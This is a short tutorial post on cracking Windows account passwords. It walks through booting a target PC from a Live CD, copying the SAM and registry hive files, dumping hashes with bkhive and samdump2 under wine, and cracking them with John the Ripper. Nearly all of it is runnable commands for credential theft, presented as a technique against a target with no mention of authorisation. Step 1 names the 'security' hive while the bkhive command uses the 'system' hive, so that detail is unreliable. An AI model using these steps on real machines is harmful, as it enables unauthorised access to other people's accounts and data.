Using bkhive, samdump2 and john to crack windows passwords

We can use bkhive, samdump2 and john to crack windows passwords. Weak passwords get cracked within minutes using this technique.

1. Copy 'C:\Windows\system32\config\sam' and 'C:\Windows\system32\config\security'. These files cannot be copied even as administrator when windows is running. Hence you have to boot target PC using Live CD to get these files.
2. Unzip Bkhive.zip in some folder.

   usage: bkhive systemhive keyfile

   so type command: 'wine Bkhive.exe system keys.txt'

   Note: use Bkreg in place of Bkhive for pre Sp4 systems.

3. Unzip Samdump2.zip in some folder
4. Type command 'wine Samdump2.exe SAM keys.txt > hashes.txt'
5. Now use 'john hashes.txt' to crack the passwords.
6. To see the cracked passwords later, just type 'john -show hashes.txt' in same folder. There is a john.pot file in the folder making this possible. John also stores some information in ~/.john.

Note: We can start john using 'john --session=imp' and press 'Ctrl+C' to stop john in between. To resume we can use 'john --restore=imp'.